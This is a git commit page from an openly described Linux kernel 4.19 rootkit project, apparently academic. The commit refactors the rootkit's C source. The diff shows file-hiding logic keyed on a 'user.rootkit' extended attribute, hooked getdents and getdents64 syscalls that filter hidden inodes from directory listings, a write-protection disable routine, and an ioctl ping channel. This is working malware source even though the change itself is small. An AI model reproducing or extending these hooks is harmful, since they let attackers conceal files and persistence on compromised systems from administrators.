linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit c095ddabeb73914893cb196bd9bc3c833528ed94
parent 1eaf28abe1435f6154153b363a4cd43de5309c6e
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 23 Nov 2020 09:08:57 +0100

refactors code

Diffstat:

Msrc/filehide.c | 8++++----


Msrc/hook.c | 5+----


Msrc/hook.h | 2+-


Msrc/ioctl.c | 4++--


4 files changed, 8 insertions(+), 11 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -2,8 +2,8 @@
 #include <linux/fs.h>
 #include <linux/fdtable.h>
 
-#define FILEHIDE_XATTR_NAME "user.rootkit"
-#define FILEHIDE_XATTR_VAL "rootkit"
+#define G7_XATTR_NAME "user.rootkit"
+#define G7_XATTR_VAL  "rootkit"
 
 #include "common.h"
 #include "filehide.h"
@@ -37,9 +37,9 @@ must_hide_inode(struct dentry *dentry)
 
     if(dentry && dentry->d_inode)
         if(!inode_permission(dentry->d_inode, MAY_READ)) {
-            ssize_t len = vfs_getxattr(dentry, FILEHIDE_XATTR_NAME, buf, SIZE);
+            ssize_t len = vfs_getxattr(dentry, G7_XATTR_NAME, buf, SIZE);
 
-            if (len > 0 && !strncmp(FILEHIDE_XATTR_VAL, buf, len))
+            if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
                 return dentry->d_inode->i_ino;
         }
 
diff --git a/src/hook.c b/src/hook.c
@@ -13,6 +13,7 @@
 extern rootkit_t rootkit;
 
 void **sys_calls;
+
 atomic_t getdents_count;
 atomic_t getdents64_count;
 
@@ -82,7 +83,6 @@ g7_getdents(const struct pt_regs *pt_regs)
     unsigned long offset;
     dirent_t_ptr kdirent, cur_kdirent, prev_kdirent;
     struct dentry *kdirent_dentry;
-    struct inode *kdirent_inode;
 
     cur_kdirent = prev_kdirent = NULL;
     int fd = (int)pt_regs->di;
@@ -98,7 +98,6 @@ g7_getdents(const struct pt_regs *pt_regs)
     atomic_inc(&getdents_count);
 
     kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
-    kdirent_inode = kdirent_dentry->d_inode;
 
     inode_list_t hidden_inodes = { 0, NULL };
     inode_list_t_ptr hi_head, hi_tail;
@@ -148,7 +147,6 @@ g7_getdents64(const struct pt_regs *pt_regs)
     unsigned long offset;
     dirent64_t_ptr kdirent, cur_kdirent, prev_kdirent;
     struct dentry *kdirent_dentry;
-    struct inode *kdirent_inode;
 
     cur_kdirent = prev_kdirent = NULL;
     int fd = (int)pt_regs->di;
@@ -164,7 +162,6 @@ g7_getdents64(const struct pt_regs *pt_regs)
     atomic_inc(&getdents64_count);
 
     kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
-    kdirent_inode = kdirent_dentry->d_inode;
 
     inode_list_t hidden_inodes = { 0, NULL };
     inode_list_t_ptr hi_head, hi_tail;
diff --git a/src/hook.h b/src/hook.h
@@ -23,7 +23,7 @@ void remove_hooks(void);
 void disable_protection(void);
 void enable_protection(void);
 
-
+// hooks
 asmlinkage long g7_getdents(const struct pt_regs *);
 asmlinkage long g7_getdents64(const struct pt_regs *);
 
diff --git a/src/ioctl.c b/src/ioctl.c
@@ -37,10 +37,10 @@ detect_channel(unsigned cmd)
 int
 handle_ping(unsigned long arg)
 {
-    (void)copy_from_user(buf, (const char *)arg, BUFLEN);
+    copy_from_user(buf, (const char *)arg, BUFLEN);
     if (!strcmp("PING", buf)) {
         buf[1] = 'O';
-        (void)copy_to_user((char *)arg, buf, BUFLEN);
+        copy_to_user((char *)arg, buf, BUFLEN);
     }
 
     return 0;